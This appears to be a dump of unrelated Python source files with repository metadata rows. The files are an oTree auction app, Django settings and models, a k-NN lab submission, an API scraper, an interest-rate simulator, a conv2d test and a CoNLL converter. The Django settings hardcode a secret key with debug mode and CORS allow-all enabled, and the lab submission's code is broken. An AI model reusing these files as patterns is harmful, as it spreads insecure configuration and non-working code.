sheet['A1'] = 'Hello world!'
print(sheet['A1'].value)
| [
"chendong333@gmail.com"
] | chendong333@gmail.com |
42ab79d67ef44fa6522a1970e74a26b4debaf35c | 86a0be02c5fd86936742efb64f8d0fa82a7c96aa | /volunteer/models.py | bb5e7a199b9ea4cb4ab3fe37a7fa41ab1d44cb2a | [] | no_license | chapkovski/every-second-auction | 8e0c5a3b46c88c17e9f7545ee89845b7021609be | a8213eeb17f9b04b4b67e3111fe49cd6d1d6e75f | refs/heads/master | 2021-01-23T10:56:56.636657 | 2018-06-20T01:08:48 | 2018-06-20T01:08:48 | 93,109,957 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,421 | py | from otree.api import (
models, widgets, BaseConstants, BaseSubsession, BaseGroup, BasePlayer,
Currency as c, currency_range
)
# from background_task import background
# from background_task.models import Task
import atexit
import subprocess
from django.db import transaction, models as dmodels
import channels
import json
from django.db import connection
from twisted.internet import task
author = 'Filipp Chapkovski, chapkovski@gmail.com'
doc = """
Your app description
"""
from django.db.models.signals import pre_save, post_save
from django.dispatch import receiver
def group_model_exists():
    # True once the volunteer_group table exists in the database (i.e.
    # migrations have run); guards the background tick against querying
    # a missing table during startup.
    return 'volunteer_group' in connection.introspection.table_names()
# for p in players:
# print(p.participant.code)
class Constants(BaseConstants):
    # oTree session constants for the every-second auction app.
    name_in_url = 'volunteer'
    players_per_group = 3
    num_rounds = 1
    endowment = 50  # starting budget; also the cap the rising price can hit
    instruction_template = 'volunteer/Instructions.html'
class Subsession(BaseSubsession):
    def before_session_starts(self):
        # No per-round setup required for this app.
        ...
class Player(BasePlayer):
    # True for the player who won the auction (accepted the current price).
    auction_winner = models.BooleanField(initial=False)
    def set_payoff(self):
        # Everyone starts from the endowment; the winner additionally pays
        # the final price. If the group timed out (price reached the
        # endowment with no volunteer), all payoffs collapse to zero.
        self.payoff = (Constants.endowment - self.group.price * self.auction_winner) * (not self.group.timeout)
class Group(BaseGroup):
    price = models.IntegerField(initial=0)  # current (rising) auction price
    activated = models.BooleanField()  # True while the clock should tick for this group
    timeout = models.BooleanField(initial=False)  # price hit the endowment with nobody accepting
    def get_channel_group_name(self):
        # Channel-layer group used to push price updates to all members.
        return 'auction_group_{}'.format(self.pk)
    def advance_participants(self):
        # Tell every connected client to move past the auction page.
        channels.Group(self.get_channel_group_name()).send(
            {'text': json.dumps({'accept': True})})
def runEverySecond():
    # Body of the 1-second Twisted LoopingCall below: for every activated
    # group, raise the price by 1 and broadcast it over the channel layer;
    # once the price reaches the endowment, flag a timeout and advance all
    # participants past the auction page.
    print('checking if there are active groups...')
    # Skip entirely until migrations have created the Group table.
    if group_model_exists():
        activated_groups = Group.objects.filter(activated=True)
        for g in activated_groups:
            if g.price < Constants.endowment:
                g.price += 1
                g.save()
                channels.Group(
                    g.get_channel_group_name()
                ).send(
                    {'text': json.dumps(
                        {'price': g.price})}
                )
            else:
                g.timeout = True
                g.save()
                g.advance_participants()
# Start the once-per-second auction clock at import time; the 'running'
# guard avoids starting a second loop if the module is re-imported.
l = task.LoopingCall(runEverySecond)
if not l.running:
    l.start(1.0)
| [
"chapkovski@gmail.com"
] | chapkovski@gmail.com |
1344bc46f555597e1654cc4a18d9b3bb99d739fe | 1065fe984e4dfe4e164e09f72a96b183cecdc94f | /sencity/settings.py | 870bdab1aa9bef6facd1538c9cfe9255b88f5190 | [] | no_license | tim-vu/sencity | 6cdd0ee60c4448ea8c3e95f177b2e90d3140d396 | cecd1c03bf84e10a853be23ef2f3e6c8b9974794 | refs/heads/master | 2023-07-29T08:02:01.065283 | 2021-09-01T12:22:52 | 2021-09-01T12:22:52 | 402,050,830 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,855 | py | """
Django settings for sencity project.
Generated by 'django-admin startproject' using Django 3.0.3.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '0gi3^23uo^63%$ar3*ujla-313j8or_l5p!)tafb8b&wv_vt6a'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'hubs.apps.HubsConfig',
'incidents.apps.IncidentsConfig',
'drf_yasg',
'corsheaders',
'rest_framework',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'corsheaders.middleware.CorsMiddleware',
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'sencity.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'sencity.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
REST_FRAMEWORK = {
'DEFAULT_SCHEMA_CLASS': 'rest_framework.schemas.coreapi.AutoSchema',
'DEFAULT_RENDERER_CLASSES': (
'djangorestframework_camel_case.render.CamelCaseJSONRenderer',
'djangorestframework_camel_case.render.CamelCaseBrowsableAPIRenderer',
# Any other renders
),
'DEFAULT_PARSER_CLASSES': (
'djangorestframework_camel_case.parser.CamelCaseFormParser',
'djangorestframework_camel_case.parser.CamelCaseMultiPartParser',
'djangorestframework_camel_case.parser.CamelCaseJSONParser',
),
}
CORS_ORIGIN_ALLOW_ALL = True
| [
"tim.vuegen@hotmail.com"
] | tim.vuegen@hotmail.com |
7cf2b1b60761c5b530a5da47afc9898a2f48d0c4 | 2ab78b5953537a7a7318afe55924656af36e9c01 | /202003-ai-labtest-results/Submissions/17057696.py | d2e602f226f6b37669ad4a7f3560ad84d8d30118 | [] | no_license | ricwtk/misc | 9ed67b329840d6fb3ad9ee0e20ced99d57b9c89c | 994e2967736e5afa0a017d2df55ed48f31641886 | refs/heads/master | 2022-07-30T06:24:52.304591 | 2022-07-12T02:06:47 | 2022-07-12T02:06:47 | 188,970,865 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,365 | py | import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.neighbors import KNeighborsClassifier
import matplotlib.pyplot as plt
from matplotlib import cm
from matplotlib.colors import ListedColormap
import numpy as np
# import glass.csv as DataFrame
data = pd.read_csv("glass.csv", names=["Id", "RI", "Na", "Mg", "Al", "Si", "K", "Ca", "Ba", "Fe", "Glass type"], index_col=0)
''' Instructions
1. split the data into 70% training and 30% testing data
- use Na, Mg, Al, Si, K, Ca, Ba, and Fe (i.e. all columns except Glass type) as the input features.
- use Glass type as the target attribute.
2. plot the accuracy of knn classifiers for all odd value of k between 3 to 100, i.e. k = 3, 5, 7, ..., 100. This is achieved by fulfilling the following tasks:
i. create a loop to
A. fit the training data into knn classifiers with respective k.
B. calculate the accuracy of applying the knn classifier on the testing data.
C. print out the accuracy for each k.
ii. plot a line graph with the y-axis being the accuracy for the respective k and x-axis being the value of k. You DO NOT need to save the graph.
'''
# start your code after this line --------------------------------------------------------------------------------------
input_column = ["Na", "Mg", "Al", "Si", "K", "Ca", "Ba", "Fe"]
x = input_column
y = data['Glass type']
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.3)
#SECOND TASK: KNN CLASSIFIER
start, end = 3, 100
k = 0
for i in range(start, end + 1):
if i % 2 != 0:
k = k + 1
print(k)
knc = KNeighborsClassifier(k)
input_columns = data['attributes'].columns[:2].tolist()
x_train = data['train']['attributes'][input_columns]
y_train = data['train']['target'].species
knc.fit(x_train, y_train)
x_test = data['test']['attributes'][input_columns]
y_test = data['test']['target'].species
y_predict = knc.predict(x_test)
print(pd.DataFrame(list(zip(y_test,y_predict)), columns=['target', 'predicted']))
print(f'Accuracy: {knc.score(x_test,y_test):.4f}')
colormap = cm.get_cmap('tab20')
cm_dark = ListedColormap(colormap.colors[::2])
cm_light = ListedColormap(colormap.colors[1::2])
x_min = data['attributes'][input_columns[0]].min()
x_max = data['attributes'][input_columns[0]].max()
x_range = x_max - x_min
x_min = x_min - 0.1 * x_range
x_max = x_max + 0.1 * x_range
y_min = data['attributes'][input_columns[1]].min()
y_max = data['attributes'][input_columns[1]].max()
y_range = y_max - y_min
y_min = y_min - 0.1 * y_range
y_max = y_max + 0.1 * y_range
xx, yy = np.meshgrid(np.arange(x_min, x_max, .01*x_range),
np.arange(y_min, y_max, .01*y_range))
z = knc.predict(list(zip(xx.ravel(), yy.ravel())))
z = z.reshape(xx.shape)
plt.figure(figsize=[12,8])
plt.pcolormesh(xx, yy, z, cmap=cm_light)
plt.scatter(x_train[input_columns[0]], x_train[input_columns[1]],
c=y_train, label='Training data', cmap=cm_dark,
edgecolor='black', linewidth=1, s=150)
plt.scatter(x_test[input_columns[0]], x_test[input_columns[1]],
c=y_test, marker='*', label='Testing data', cmap=cm_dark,
edgecolor='black', linewidth=1, s=150)
plt.xlabel(input_columns[0])
plt.ylabel(input_columns[1])
plt.legend()
| [
"ricwtk@gmail.com"
] | ricwtk@gmail.com |
986c674c72844f58e048f8216519e9f4e8400d50 | 0fb136802af06082a981bdb3a89db436be273ea2 | /ata/ata_timer/migrations/0005_employee_team_id.py | 19320a183f215e6b0dab56bf5eeae536c48c03dd | [] | no_license | ata333/wasem_task | 654b6ef30c59795f9a8dc72ad3377a9855d06950 | 1d49ffbdb41518ddca77ffdf5ba8c0a9b67a0fe1 | refs/heads/main | 2023-02-17T01:23:01.383078 | 2021-01-20T12:26:39 | 2021-01-20T12:26:39 | 331,279,223 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 490 | py | # Generated by Django 3.1.5 on 2021-01-16 10:54
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('ata_timer', '0004_remove_employee_team_id'),
]
operations = [
migrations.AddField(
model_name='employee',
name='team_id',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='ata_timer.team'),
),
]
| [
"ataaburajabedx@gmail.com"
] | ataaburajabedx@gmail.com |
c606d65881d68d6ccbea9e9dca2d271c3fbb4b90 | 4210b6df0fb265285d3fb57c694042190a51deb5 | /init-tables.py | 15d41119f2cf73bbae50fda7709ace285e698b06 | [] | no_license | ryebread8303/gw2api-py | 21ee8020947b23ba0c7b03a5d3e82d5919778b2b | d1668eb738cbaf4e96d3ffdd5c73132711b64557 | refs/heads/master | 2020-12-24T20:33:36.484155 | 2016-05-22T20:44:03 | 2016-05-22T20:44:03 | 59,261,033 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,084 | py | #!/usr/bin/python2
import requests,json
import sqlite3 as sql
import sys
def jsonreq(uri):
return json.loads((requests.get(uri)).text)
def insertitem(idnum,name,nosell):
cur.execute("INSERT INTO Items VALUES(?,?,?)",(idnum,name,nosell))
baseapi = "https://api.guildwars2.com/v2"
item_list = jsonreq(baseapi+"/items")
pagecount = len(item_list)/200
con = None
try:
con = sql.connect('items.db')
cur = con.cursor()
cur.execute("DROP TABLE IF EXISTS Items")
cur.execute("DROP TABLE IF EXISTS Prices")
cur.execute("CREATE TABLE Items(Id INT, Name TEXT,NoSell BOOLEAN)")
cur.execute("CREATE TABLE Prices(Id INT, Buys INT, Sells INT, Day INT, Year IN)")
for i in range(pagecount):
print "Loading page: "+str(i+1)+" of "+str(pagecount)
items = jsonreq(baseapi+"/items?page="+str(i)+"&page_size=200")
for item in items:
item_id = item['id']
item_name = item['name']
item_nosell = 'NoSell' in item['flags']
insertitem(item_id,item_name,item_nosell)
con.commit()
except sql.Error, e:
print "Error: %s" %e.args[0]
sys.exit(1)
finally:
if con:
con.close()
| [
"ryebread8403@gmail.com"
] | ryebread8403@gmail.com |
53255a5fce27a2f72d42848404eef76c04596bdf | b9776d148da3bf9d37954d34b1ab236d41310cb2 | /product/models.py | a5d9a1154df4995cc85fccb43f48fc8043cdc8de | [] | no_license | Harshitsharma34/ResaleApp | b3cb62fa1953aa042c3ad19beb8162eba094c87a | a23187dfb05db2445ebbafa9a316e2da89b2d489 | refs/heads/master | 2022-11-05T18:29:42.140170 | 2020-06-19T17:31:33 | 2020-06-19T17:31:33 | 273,293,693 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,411 | py | from django.db import models
from django.contrib.auth.models import User
from django.utils import timezone
from django.utils.text import slugify
# Create your models here.
class Product(models.Model):
CONDITION_TYPE = (
("New", "New"),
("Used", "Used"),
("Extremely Old", "Extremely Old"),
("Old", "Old"),
)
name = models.CharField(max_length=100)
owner = models.ForeignKey(User, on_delete=models.CASCADE)
description = models.TextField(max_length=500)
condition = models.CharField(max_length=100, choices=CONDITION_TYPE)
brand = models.ForeignKey('Brand', on_delete=models.SET_NULL, null=True)
category = models.ForeignKey(
'Category', on_delete=models.SET_NULL, null=True)
price = models.DecimalField(max_digits=10, decimal_places=2)
created = models.DateTimeField(default=timezone.now)
image = models.ImageField(
upload_to='main_products/', blank=False, null=False)
slug = models.SlugField(blank=True, null=True)
def save(self, *args, **kwargs):
if not self.slug and self.name:
self.slug = slugify(self.name)
super(Product, self).save(*args, **kwargs)
def __str__(self):
return self.name
class Brand(models.Model):
# For Product Category
brand_name = models.CharField(max_length=50)
class Meta:
verbose_name = 'brand'
verbose_name_plural = 'brands'
def __str__(self):
return self.brand_name
class ProductImages(models.Model):
product = models.ForeignKey(Product, on_delete=models.CASCADE)
image = models.ImageField(upload_to='products/', blank=True, null=True)
class Meta:
verbose_name = 'product image'
verbose_name_plural = 'product images'
def __str__(self):
return self.product.name
class Category(models.Model):
# For Product Category
category_name = models.CharField(max_length=50)
image = models.ImageField(upload_to='category/', blank=True, null=True)
slug = models.SlugField(blank=True, null=True)
def save(self, *args, **kwargs):
if not self.slug and self.category_name:
self.slug = slugify(self.category_name)
super(Category, self).save(*args, **kwargs)
class Meta:
verbose_name='category'
verbose_name_plural='categories'
def __str__(self):
return self.category_name
| [
"harshitsharma34@gmail.com"
] | harshitsharma34@gmail.com |
f43f5ef928e91ce17d483b1409cabfdfee353f1a | 9dd9999d1cad18349a0354669b5696134209495e | /rate_models/sr1fsim.py | 801523aad3b7edb9ae9e04d5f094fc015e5d0c27 | [] | no_license | phetdam/prog_proj | d8edf1d8a850557bea384eaa0d89bb12fe8f72f9 | f06c5a6a755be258a371f04d2a5d69a782e5bbb5 | refs/heads/master | 2020-03-27T14:36:25.819919 | 2019-05-24T04:56:21 | 2019-05-24T04:56:21 | 146,671,870 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,788 | py | # runs simulations of and plots single-factor short rate models (cir and vasicek).
# can be specified data to calibrate models with, the type of model to run, and
# the number of processes to generate.
#
# Changelog:
#
# 10-29-2018
#
# removed PL_TITLES; the title of each plot will simply be MTYPE
#
# 10-27-2018
#
# added additional flag to specify the model to run (vasicek or cir). if model is not
# specified, the default process will be a vasicek model. changed several variable
# names and file name (from cir_main.py to sr1fsim.py) to reflect the more general
# nature of the file. added list of acceptable models and some other variables.
#
# 10-26-2018
#
# added additional flags and modes. can be calibrated off of a calibration file with
# flag -cf=file_name:data_col, and run k processes with flag -np=k. basically added a
# big chunk of boilerplate code to catch input errors. changed parameters from being
# displayed in the legend for each individual process to being displayed in the title;
# all processed in one graph have the same parameters anyways.
#
# 10-24-2018
#
# initial creation; git commit. renamed to cir_main.py, modified usage, cleaned a little
# program name
PROGNAME = "sr1fsim"
# help flag
HELP_FLAG = "--help"
# calibration flag
CF_FLAG = "-cf"
# number of processes to run
NP_FLAG = "-np"
# model type flag
MT_FLAG = "-mt"
# csv extension
CSV_EXT = ".csv"
# model names
# cox-ingersoll-ross model
CIR_N = "cir"
# vasicek model
VAS_N = "vas"
# acceptable model types to pass to MT_FLAG
MTYPES = [CIR_N, VAS_N]
# help string
HELP_STR = ("Usage: {0} [ [ {1}=csv_file:data_col ] [ {2}=model ] [ {3}=k ] ]\n"
" {0} [ {4} ]\n"
"generates stochastic short rate processes, by default 2, which will be\n"
"started with default parameters unless a data file (must be {5} file) and\n"
"a specified column of numerical data in that file is given, in which case\n"
"the process will be calibrated in an attempt to mimic the characteristics\n"
"of the data. a different number of processes k will be generated if specified.\n"
"default model run will be the vasicek model, unless a specific model is\n"
"specified at runtime with the {2} flag.\n\n"
"flags:\n\n"
"{1}\ttakes argument of form csv_file:data_col, where csv_file is the data\n"
"\tfile and data_col is the data column in the file to use for calibration.\n"
"{2}\ttakes argument model, which is the name of the model to run.\n"
"{3}\ttakes argument k, which is the number of processes to generate.\n"
"{4}\tprints this usage\n\n"
"acceptable arguments for flag {2}:\n\n"
"{6}\tcox-ingersoll-ross model\n"
"{7}\tvasicek model".format(PROGNAME, CF_FLAG, MT_FLAG, NP_FLAG, HELP_FLAG,
CSV_EXT, CIR_N, VAS_N)
)
# indicates type of model being used; default "vas" (VAS_N)
MTYPE = VAS_N
# indicates how many processes should be generated; default 2
PR_N = 2
# default configurations for models; list [a, mu, dt, sigma, n]
MODEL_PARAM = [0.03, 0.1, 0.001, 0.07, 1000]
# import matplotlib; catch exception
try:
import matplotlib.pyplot as plt
except:
print("{}: please install matplotlib.".format(PROGNAME))
quit()
# import math lib and sys
import math
import sys
# import pandas and numpy
import pandas as pd
import numpy as np
# import short_rate_1f
import short_rate_1f as sr1f
# main
if (__name__ == "__main__"):
# get length of arguments in the argv vector
argc = len(sys.argv)
# if there are no arguments
if (argc == 1):
pass
# else if there is one argument
elif (argc == 2):
# if it is the help option, print usage and exit
if (sys.argv[1] == HELP_FLAG):
print(HELP_STR)
quit()
# else pass
pass
# else if there are two or three arguments (just pass)
elif (argc == 3 or argc == 4):
pass
# else too many arguments
else:
print("{0}: too many arguments. type '{0} {1}' for usage.".format(PROGNAME, HELP_FLAG))
quit()
# will be a dataframe, if CF_FLAG is passed with the correct argument
df = None
# boolean for if a calibration file and data column have been provided, and calibration
# should be performed
c_model = False
# boolean for unknown flag error
uf_error = False
# if there are one to three arguments
if (argc >=2 and argc <= 4):
# for each argument except the program name
for i in range(1, argc):
# reference to sys.argv[i]
arg = sys.argv[i]
# if the argument contains CF_FLAG, NP_FLAGS, or MT_FLAG
if (CF_FLAG in arg or NP_FLAG in arg or MT_FLAG in arg):
# attempt to split arg by "="
s_arg = arg.split("=")
# if s_arg size is not 2, set uf_error to True and break
if (len(s_arg) != 2):
uf_error = True
break
# if s_arg[0] == CF_FLAG
if (s_arg[0] == CF_FLAG):
# split argument into file name and data column [file, col]
fnd = s_arg[1].split(":")
# if size of fnd != 2, print error and exit
if (len(fnd) != 2):
print("{0}: error: argument to {1} must be of form file:col.".format(
PROGNAME, CF_FLAG))
quit(1)
# unpack into file name, column name
fn, cn = fnd
# check file extension of file; must be CSV_EXT (.csv)
# if not, print error and exit
if (CSV_EXT not in fn):
print("{0}: error: calibration file must be a {1} file.".format(
PROGNAME, CSV_EXT))
quit(1)
# else it is, so read into dataframe (let python handle errors)
df = pd.read_csv(fn)
# try to locate column in dataframe; if not, print error and exit
if (cn not in df.columns):
print("{0}: error: column {1} not in file {2}.".format(PROGNAME, cn, fn))
quit(1)
# set c_model to True so that calibration will take place
c_model = True
# else if s_arg[0] == NP_FLAG
elif (s_arg[0] == NP_FLAG):
# attempt to cast argument to int and assign to PR_N
try:
PR_N = int(s_arg[1])
# print error and exit
except:
print("{0}: error: argument to {1} expected to be positive int.".format(
PROGNAME, NP_FLAG))
quit(1)
# if PR_N has been set to less than 1, print error and exit
if (PR_N < 1):
print("{0}: error: argument to {1} must be positive.".format(
PROGNAME, NP_FLAG))
quit(1)
# else if s_arg[0] == MT_FLAG
elif (s_arg[0] == MT_FLAG):
# if the argument is not in MTYPES (invalid), print error and exit
if (s_arg[1] not in MTYPES):
print("{0}: error: invalid argument to {1}. acceptable args: {2}".format(
PROGNAME, MT_FLAG, MTYPES))
quit(1)
# else we have a valid model, so set MTYPE to the argument
MTYPE = s_arg[1]
# else set uf_error to True and break
else:
uf_error = True
break
# else it's some random argument; set uf_error to True and break
else:
uf_error = True
break
# if there is an uf_error (unknown flag error), print error and exit
if (uf_error):
print("{0}: error: unknown flag '{1}'. type '{0} {2}' for usage.".format(
PROGNAME, arg, HELP_FLAG))
quit(1)
# if c_model is True, calibrate model
if (c_model):
# return calibration to MODEL_PARAM, using column cn in dataframe df
# do not change dt or n scale
MODEL_PARAM = sr1f.calibrate_model(df[cn])
# print model type and params
print(MTYPE, MODEL_PARAM)
# determine which model to use by binding appropriate function name to return_pr
# if we have specified cir process
if (MTYPE == CIR_N):
return_pr = sr1f.return_cir
# else if we have specified vasicek model
elif (MTYPE == VAS_N):
return_pr = sr1f.return_vas
# create figure and plot processes
# figure size width 12", height 9"
fg = plt.figure(figsize = (12, 9))
# for PR_N iterations
for i in range(PR_N):
# get x (t) and y (r) series of generated process; element 0 is time series, 1 is r
x, y = return_pr(*MODEL_PARAM, cc = i, df = False)
# plot the series; label each as MTYPE + "_i"
plt.plot(x, y, label = "{0}_{1}".format(MTYPE, i))
# format after plotting
# x label, y label (make vertical)
plt.xlabel("t")
plt.ylabel("r", rotation = 0)
# graph title; put parameters there so you don't clutter the graph
plt.title("{0} (a={1}, mu={2}, dt={3}, sigma={4}, n={5})".format(
MTYPE, *[round(e, 7)for e in MODEL_PARAM]))
# show legend
plt.legend()
# save to file MTYPE + ".png"
plt.savefig(MTYPE + ".png")
| [
"djh458@stern.nyu.edu"
] | djh458@stern.nyu.edu |
0975a9270e7422949e57a1c4734c1c3efa1d7ecb | a773e293d6e43376e3554770a1da9322b05f143b | /scratch/test/conv2d_test.py | d3417c7d4e14042585a2aee827dbf903312d820b | [
"MIT"
] | permissive | zli117/ML-From-Scratch | 11c18f8e0c843c9ada9ea02943baf9623a82e85c | cb97308ae9e297354b398dfe7a0d5fb361b866e9 | refs/heads/master | 2020-03-08T08:00:30.021522 | 2018-08-22T06:34:33 | 2018-08-22T06:34:33 | 128,009,763 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,147 | py | """
Test for convolution 2d layer
"""
import unittest
import numpy as np
import torch
from torch.autograd import Variable
from torch.nn import Conv2d
from scratch.layers.conv2d import Conv2DLayer
class TestConv2DLayer(unittest.TestCase):
def setUp(self):
self.configs = [
# in channel, out channel, kernel size, stride, padding, bias, \
# batch size, height, width
(3, 5, 5, 2, 4, False, 2, 10, 10),
(5, 2, 7, 2, 4, False, 2, 5, 5),
(5, 2, 7, 2, 4, False, 2, 15, 3),
(5, 2, 7, 2, 4, False, 2, 3, 15),
(5, 5, 3, 4, 2, False, 5, 8, 7),
(3, 5, 5, 2, 4, True, 2, 10, 10),
(5, 2, 7, 2, 4, True, 2, 5, 5),
(5, 2, 7, 2, 4, True, 2, 15, 3),
(5, 2, 7, 2, 4, True, 2, 3, 15),
(5, 5, 3, 4, 2, True, 5, 8, 7),
]
def helper_func(self, config_idx):
(in_ch, out_ch, k_size, stride, padding, has_bias, batch_size, height,
width) = self.configs[config_idx]
torch_conv2d = Conv2d(
in_ch,
out_ch,
k_size,
stride=stride,
padding=padding,
bias=has_bias)
torch_conv2d.type(torch.DoubleTensor)
conv2d_layer = Conv2DLayer(
in_ch, (k_size, k_size),
out_ch,
lambda t: torch.nn.init.normal(t, -1, 1),
stride=(stride, stride),
padding=(padding, padding),
bias=has_bias)
conv2d_layer.type(torch.DoubleTensor)
input_tensor = (torch.DoubleTensor(batch_size, in_ch, height, width)
.uniform_(-1, 1))
input_layer = Variable(input_tensor, requires_grad=True)
input_torch = Variable(input_tensor.clone(), requires_grad=True)
bias_tensor = torch.DoubleTensor(out_ch).uniform_(-1, 1)
weights = (torch.DoubleTensor(out_ch, in_ch, k_size, k_size).uniform_(
-1, 1))
torch_conv2d.weight.data.copy_(weights)
if has_bias:
torch_conv2d.bias.data.copy_(bias_tensor)
layer_weight_shape = (out_ch, in_ch * k_size * k_size)
conv2d_layer.kernels.data.copy_(weights.view(layer_weight_shape))
if has_bias:
conv2d_layer.bias.data.copy_(bias_tensor.view(out_ch, 1))
layer_result = conv2d_layer(input_layer)
layer_result_np = layer_result.data.numpy()
torch_result = torch_conv2d(input_torch)
torch_result_np = torch_result.data.numpy()
self.assertTrue(np.allclose(layer_result_np, torch_result_np))
# verify gradient
gradient = torch.DoubleTensor(layer_result.shape)
layer_result.backward(gradient)
torch_result.backward(gradient)
self.assertTrue(
np.allclose(
input_layer.grad.data.numpy(),
input_torch.grad.data.numpy(),
equal_nan=True))
layer_weight_grad = conv2d_layer.kernels.grad
torch_weight_grad = torch_conv2d.weight.grad.view(layer_weight_shape)
self.assertTrue(
np.allclose(
layer_weight_grad.data.numpy(),
torch_weight_grad.data.numpy(),
equal_nan=True))
if has_bias:
layer_bias_grad = conv2d_layer.bias.grad.view(out_ch)
torch_bias_grad = torch_conv2d.bias.grad.view(out_ch)
self.assertTrue(
np.allclose(
layer_bias_grad.data.numpy(),
torch_bias_grad.data.numpy(),
equal_nan=True))
def test1(self):
self.helper_func(0)
def test2(self):
self.helper_func(1)
def test3(self):
self.helper_func(2)
def test4(self):
self.helper_func(3)
def test5(self):
self.helper_func(4)
def test6(self):
self.helper_func(5)
def test7(self):
self.helper_func(6)
def test8(self):
self.helper_func(7)
def test9(self):
self.helper_func(8)
def test10(self):
self.helper_func(9)
if __name__ == '__main__':
unittest.main()
| [
"development.my6565@gmail.com"
] | development.my6565@gmail.com |
02ef3aceb670550ecb12d3958c68f836e5511627 | e7a9032a3a222dc7363e1f9c083559ef98ae33c7 | /scripts/convert_conll03_to_json.py | 76900a39699429f3a551ffb5dfaa92b8cf05911d | [
"MIT"
] | permissive | fagan2888/instance-based-ner | ed6ccee034661e6a9572ce8f2962b643f1a47c0d | 7bd8a29dfb1e13de0775b5814e8f9b27ec490008 | refs/heads/master | 2022-12-17T15:03:05.615927 | 2020-09-16T01:18:10 | 2020-09-16T01:18:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,290 | py | # coding=utf-8
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import argparse
import codecs
import random
import ujson
def load(filename):
with codecs.open(filename, mode="r", encoding="utf-8") as f:
words, tags = [], []
for line in f:
line = line.lstrip().rstrip()
if line.startswith("-DOCSTART-"):
continue
if len(line) == 0:
if len(words) != 0:
yield words, tags
words, tags = [], []
else:
line = line.split()
words.append(line[0])
tags.append(line[-1])
def write_json(filename, data):
with codecs.open(filename, mode="w", encoding="utf-8") as f:
ujson.dump(data, f, ensure_ascii=False)
def remove_duplicate_sents(sents):
new_sents = []
for i, (words1, tags1) in enumerate(sents):
for (words2, _) in sents[i + 1:]:
if words1 == words2:
break
else:
new_sents.append((words1, tags1))
return new_sents
def bio2span(labels):
spans = []
span = []
for w_i, label in enumerate(labels):
if label.startswith('B-'):
if span:
spans.append(span)
span = [label[2:], w_i, w_i]
elif label.startswith('I-'):
if span:
if label[2:] == span[0]:
span[2] = w_i
else:
spans.append(span)
span = [label[2:], w_i, w_i]
else:
span = [label[2:], w_i, w_i]
else:
if span:
spans.append(span)
span = []
if span:
spans.append(span)
return spans
def main(argv):
sents = list(load(argv.input_file))
print("Sents:%d" % len(sents))
if argv.remove_duplicates:
sents = remove_duplicate_sents(sents)
print("Sents (removed duplicates): %d" % len(sents))
data = []
n_sents = 0
n_words = 0
n_spans = 0
for words, bio_labels in sents:
spans = bio2span(bio_labels)
data.append({"sent_id": n_sents,
"words": words,
"bio_labels": bio_labels,
"spans": spans})
n_sents += 1
n_words += len(words)
n_spans += len(spans)
if argv.split > 1:
split_size = int(len(data) / argv.split)
random.shuffle(data)
data = data[:split_size]
n_sents = len(data)
n_words = 0
n_spans = 0
for record in data:
n_words += len(record["words"])
n_spans += len(record["spans"])
if argv.output_file.endswith(".json"):
path = argv.output_file
else:
path = argv.output_file + ".json"
write_json(path, data)
print("Sents:%d\tWords:%d\tEntities:%d" % (n_sents, n_words, n_spans))
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='SCRIPT')
parser.add_argument('--input_file',
help='path to conll2003')
parser.add_argument('--output_file',
default="output",
help='output file name')
parser.add_argument('--remove_duplicates',
action='store_true',
default=False,
help='remove duplicates')
